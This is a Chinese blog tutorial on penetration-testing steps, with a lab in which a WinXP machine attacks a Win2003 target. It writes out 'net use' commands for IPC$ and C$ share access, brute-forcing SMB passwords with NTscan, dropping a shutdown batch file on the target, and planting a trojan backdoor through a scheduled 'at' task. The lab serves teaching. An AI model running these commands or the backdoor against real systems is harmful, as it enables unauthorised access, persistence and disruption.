第18节 渗透测试流程和简单案例

已于 2022-07-01 03:05:31 修改
阅读量4.4k 收藏 16
点赞数 5
分类专栏: # 筑基02:Windows系统服务器 文章标签: 网络安全 渗透测试
于 2021-12-19 01:11:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/122006115
版权

渗透测试流程和简单案例


本文章仅供教学研究使用,切莫在真实环境中试验。

1渗透测试概述

  • 渗透测试:渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!
  • 渗透测试分为 白盒测试黑盒测试
  • 白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析。
  • 黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透。

2渗透测试大致流程

  1. 授权允许测试,保证合法。
  2. 信息收集(nslookup、whois):收集名称、手机号、IP等信息,有利于破解密码。
  3. 扫描漏洞、端口等(利用nmap\scanport等工具或Telnet手工测试):
    例子:nmap = ip范围 端口 80 (IIS系统类型、发布软件、扫描网站等,各种系统及发布方式都可能存在漏洞)→针对系统类型及其他信息,扫描其漏洞。
  4. 漏洞利用
  5. 提权(shell环境即命令环境、桌面环境、获取最高权限)
  6. 渗透测试报告(网络渗透人员)/为所欲为+毁尸灭迹+留后门(骇客)

3简单实验

3.1扫描

  1. 打开win2003及winxp,win2003配置固定IP10.1.1.1,winxp配置固定IP10.1.1.2,由winxp攻击win2003.
  2. win2003中→右键我的电脑→管理→服务→Telnet设为启动,注意常规和恢复中均需要设置。
    在这里插入图片描述
  3. 在winxp中→cmd→telnet除了作为命令式远程管理外还可以作为探测工具→telnet 10.1.1.1 445
    在这里插入图片描述
  4. 使用小工具scanport对目标IP群和端口群进行扫描,扫描后可以大概确定攻击目标。
    在这里插入图片描述

3.2利用共享服务端口445漏洞之IPC$

  1. win2003中创建共享文件夹share,设置权限等。
  2. 在winxp中验证共享文件夹是否能访问。
    在这里插入图片描述
  3. 将share文件夹映射到winxp本地盘符。winxp→cmd→net use f: \10.1.1.1\share ******** /user: administrator。注意f:后、/user前是有一个空格的。
  4. 相关命令:
net use					#查看已建立映射列表
net use f: /del			#删除f盘的映射
net use * /del			#
net use f: \\10.1.1.1\C$ 密码 /user:账号
net use \\10.1.1.1\IPc$ 密码 /user:账号		#空连接,没有具体路径
net use f: \\10.1.1.1\IPc$ 密码 /user:账号

3.3修改用户名增加暴力破解难度的方式

  1. 对于账户未知的,账户和密码均需要暴力破解。
  2. 对于账户名,首先可以通过修改默认名称,避免直接利用默认名称进行密码暴力破解;其次,可以增加几个默认名称,设置为低权限的账户,让密码暴力破解作无用功。
  3. 服务器的账户可以对administrator账户名进行修改(右键计算机→管理),位置如下:在这里插入图片描述

3.4暴力破解密码

  1. 在win2008中→cmd→net user administrator 123.com方便破解。
  2. 打开“真空密码字典生成器”→选择所需要的符号并设定密码长度范围→制作字典在这里插入图片描述
  3. 打开NTscan软件,该软件仅针对445端口密码进行暴力破解,将上一步保存的字典复制黏贴到此处,并修改名字为NT_pass.dic,开始暴力破解。在这里插入图片描述

3.5漏洞利用

  1. 向靶机C盘写入文件
#将靶机C盘映射到本地F盘
net use f:\\10.1.1.1\C$ 123.com /user:administrator
#将屏幕信息输入haha.bat
copy con haha.bat
shutdown -s -t 100
^Z
#将haha.bat复制到靶机C盘
copy haha.bat f:

在win2003C盘下生成该文件。
在这里插入图片描述
2. 开机默认映射共享文件。右键我的电脑→映射→输入驱动器和共享文件夹(在域中可以输入计算机名)→勾选登录时重连→输入账户密码。在这里插入图片描述

3.6留后门

  1. 在winxp中利用“鸽子牧民战天”软件在win2003中留后门,避免管理员账户密码修改后,又需要暴力破解的繁琐过程。配置的各类参数如下,将来再kaili的学习中以下功能均可以采用代码完成。
    在这里插入图片描述
    在这里插入图片描述

  2. 让木马知道他的主人是谁。在这里插入图片描述

  3. 获取靶机空链接的授权,将木马程序复制到目标路径下,并添加到计划任务中。

#获取靶机空链接权限
net use \\10.1.1.1\IPC$ 123.com /user:administrator
#将heihei.exe复制到靶机目录下
copy d:\heihei.exe \\10.1.1.1\C$\windows\system32\	
#查看靶机当前时间
net time \\10.1.1.1
#在稍后几分钟自动添加一项作业任务
at \\10.1.1.1 12:55 "c:\windows\system32\heihei.exe"
#查看靶机计划任务
at \\10.1.1.1

在这里插入图片描述
4. 查看木马是否正常运行。
在这里插入图片描述
5. 随后可以通过该程序实时对靶机进行监视和控制。

总结

本节主要围绕网络渗透流程这一主题,从概述入手介绍主要步骤,随后对每个步骤采用一个小实验进行讲解分析。

Fighting_hawk
关注
  • 5
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
“不一样”的真实渗透测试案例分析
HBohan的博客
07-26 2525
前言 本文是由一次真实的授权渗透案例引申而出的技术分析和总结文章。在文章中我们会首先简单介绍这次案例的整体渗透流程并进行部分演绎,但不会进行详细的截图和描述,一是怕“有心人”发现端倪去目标复现漏洞和破坏,二是作为一线攻击人员,大家都明白渗透过程也是一个试错过程,针对某一个点我们可能尝试了无数种方法,最后写入文章的只有成功的一种,而这种方法很有可能也是众所周知的方法。因此我们只会简单介绍渗透流程,然后提取整个渗透过程中比较精华的点,以点及面来进行技术分析和探讨,望不同的人有不同的收获。 白嫖的福音网安学习资.
浅谈Web渗透测试
m0_60571990的博客
02-23 629
浅谈Web渗透测试
渗透测试怎么做,看完这个就学会了
最新发布
菜鸟学识的博客
06-07 588
CSRF,全称为Cross-Site Request Forgery,跨站请求伪造,是一种网络攻击方式,它可以在用户毫不知情的情况下,以用户的名义伪造请求发送给被攻击站点,从而在未授权的情况下进行权限保护内的操作,如修改密码,转账等。① 根据前期信息搜集的信息,查看相关组件的版本,看是否使用了不在支持或者过时的组件。一些网站由于业务需求,可能提供文件查看或下载的功能,如果对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意的文件,可以是源代码文件、敏感文件等。端口开放情况,是否开放了多余的端口;
对室友电脑的一次不完全渗透(未完待续...)
weixin_30466953的博客
04-24 1236
写在正文前 回到寝室看见室友x帅在做web作业,突发奇想:web作业,运行了php环境,同c段,不就直接能访问?早该想到
说说渗透测试
一个大龄码农的专栏
11-26 1403
【1】怎么定义渗透测试 这个概念应该是渗透测试的执行者们最有资格去定义的。 我曾经就是个执行者,所以我坚信这个问题的答案与我所期望的相符 —— 无论是众测平台上的白帽子们、还是安全厂商的服务团队精英们,我给你一个IP地址、三天时间,谁可以给我打包票可以100%发现目标的全部安全问题? 我想答案一定是:不能! 有能的可以直接评论出来,我一定通过,让所有人来向你顶礼膜拜。
网络安全之一个渗透测试案例
qq_44005305的博客
02-13 375
发现BucketName字段消失了,原来的NoSuchBucket也变成了NoSuchCustomDomain,说明我们的修改对它造成了影响!无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不慌,问题不大,时间还长,接下来要做的,就是整理思路,重新来过。
渗透测试流程(PTES)思维导图
08-02
该思维导图主要针对信息安全从业者撰写的渗透流程总结而来,其中的部分专业术语的翻译可能存在偏差,希望能够及时指导。部分安全策略及攻击方法都有相对应的解释,如还有部分专业术语需要本人解释的话,请私聊我。该...
谈一谈渗透测试流程
02-24
渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。网络所有者根据渗透人员提供的...
网络安全渗透测试流程.xmind
11-27
网络安全渗透测试全流程思维导图,包括: 1.明确目标 2.信息收集的方式 3.漏洞扫描的方式 4.漏洞验证的方式 5.信息整理 6.形成报告 核心点集中在信息收集,漏洞扫描,漏洞验证这三个方面,是一个很好的参考流程,...
渗透测试流程图.zip
04-06
这份"渗透测试流程图.zip"文件包含了详细的渗透测试过程,主要目的是帮助IT专业人士和安全工程师理解并实施这一过程。其中的"渗透测试流程图.pdf"很可能是以图形化的方式详细展示了每个阶段及其相互关系。 渗透测试...
Burp Suite 开放了新的数据库打通 API 接口,快速辅助渗透测试.zip
09-24
Burp Suite 开放了新的数据库打通 API 接口,快速辅助渗透测试。.zip,基于vulners.com搜索api的漏洞扫描
渗透测试资料
04-16
渗透测试,是为了证明网络防御按照预期计划正常运行而提供的一种机制。不妨假设,你的公司定期更新安全策略和程序,时时给系统打补丁,并采用了漏洞扫描器等工具,以确保所有补丁都已打上。如果你早已做到了这些,为什么还要请外方进行审查或渗透测试呢?因为,渗透测试能够独立地检查你的网络策略,换句话说,就是给你的系统安了一双眼睛。而且,进行这类测试的,都是寻找网络系统安全漏洞的专业人士。
软件安全测试 测试用用例(样例)
05-18
软件测试过程中,功能测试及性能测试的测试用例一般比较多,但安全测试的用例就少一些,这是我日常工作中整理的安全测试用例的样例,与大家分享探讨。
渗透测试标准流程图[诸葛建伟].pdf
08-13
该流程图旨在帮助渗透测试人员和组织更好地理解和实施渗透测试,以便更好地保护信息系统和资产。 1. 信息搜集阶段 在渗透测试的初始阶段,需要收集关于目标系统和资产的信息,包括网络拓扑、系统版本、漏洞信息等...
给第一次做渗透项目的新手总结的一些感悟
hackzkaq的博客
06-07 2064
说在前面首先很重要的是授权 ,之前也看过很多关于渗透测试的文章,但是因为一些现实因素等等问题,没(bu)有(gan)真正实操,最近由于一次偶然的机会,什么都不会的我接到了一个渗透测试项目然后就把最近学到的一些东西,和一些小感悟,小技巧记录下来,由于一些特殊原因,本文中不涉及到渗透过程中的任何敏感信息首先跟我一样菜当然是装不出大神的,当然还是多学,多积累最重要,但是既然都开始了,就不能显得太划水,下面的操作不能让你成为大...
[在线挑战]【i春秋】渗透测试入门 —— 渗透测试笔记 --转
0x8g1T9E-
06-22 7535
【i春秋】渗透测试入门 —— 渗透测试笔记,原文 0x00 前言 本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,第一个是基于齐博 CMS的信息资讯平台http://www.test.ichunqiu,第二个是基于Discuz!的论坛社区http://bbs.test.ichunqiu。这两个 CMS 同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。 根据提示,第 1 题要求找到咨询平台的管理员账号密码...
网络安全|渗透测试入门案例分析,从零基础入门到精通—登录框页面的快速渗透常用检测手段
Jum的博客
06-21 1915
随着平台的多样性,用户需求的不断提高,为了方便用户通过一次性用户身份验证登录多个应用程序和网站,大多数平台都会使用 SSO 系统。在后端机制中,存在一个安全错误配置,它没有检查是否是为特定应用程序生成的 JWT 令牌——相反,它接受任何具有有效签名的 JWT 令牌。可以手动测试例如下面的一些高频弱口令,2.根据网站所使用的第三方组件,寻找特定的弱口令或默认口令进行登录。或者直接BP走一波。在网站后台登录的页面常用的渗透办法今天给大家分享一下,这样更好的让大家在日常维护网站的时候好注意在各个方便进行防御。
(值得收藏)渗透测试常用方法总结
门柚的博客
01-12 2659
先点个关注吧! 一、渗透流程 信息收集 漏洞验证/漏洞攻击 提权,权限维持 日志清理 信息收集 一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎 端口扫描 有授权的情况下直接使用 nmap 、masscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。使用 Python 端口扫描的介绍https://thief.one/2018/05/17/1/?hmsr=toutiao.io&utm_med
渗透测试怎么做?一文从3个步骤从0到1实战,学姐看完直呼我也会...
m0_58026506的博客
02-08 1152
01信息收集1、域名、IP、端口域名信息查询:信息可用于后续渗透IP信息查询:确认域名对应IP,确认IP是否真实,确认通信是否正常端口信息查询:NMap扫描,确认开放端口发现:一共开放两个端口,80为web访问端口,3389为windows远程登陆端口,嘿嘿嘿,试一下发现:是Windows Server 2003系统,OK,到此为止。2、指纹识别其实就是网站的信息。比如通过可以访问的资源,如网站首页,查看源代码:看看是否存在文件遍历的漏洞(如图片路径,再通过../遍历文件)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值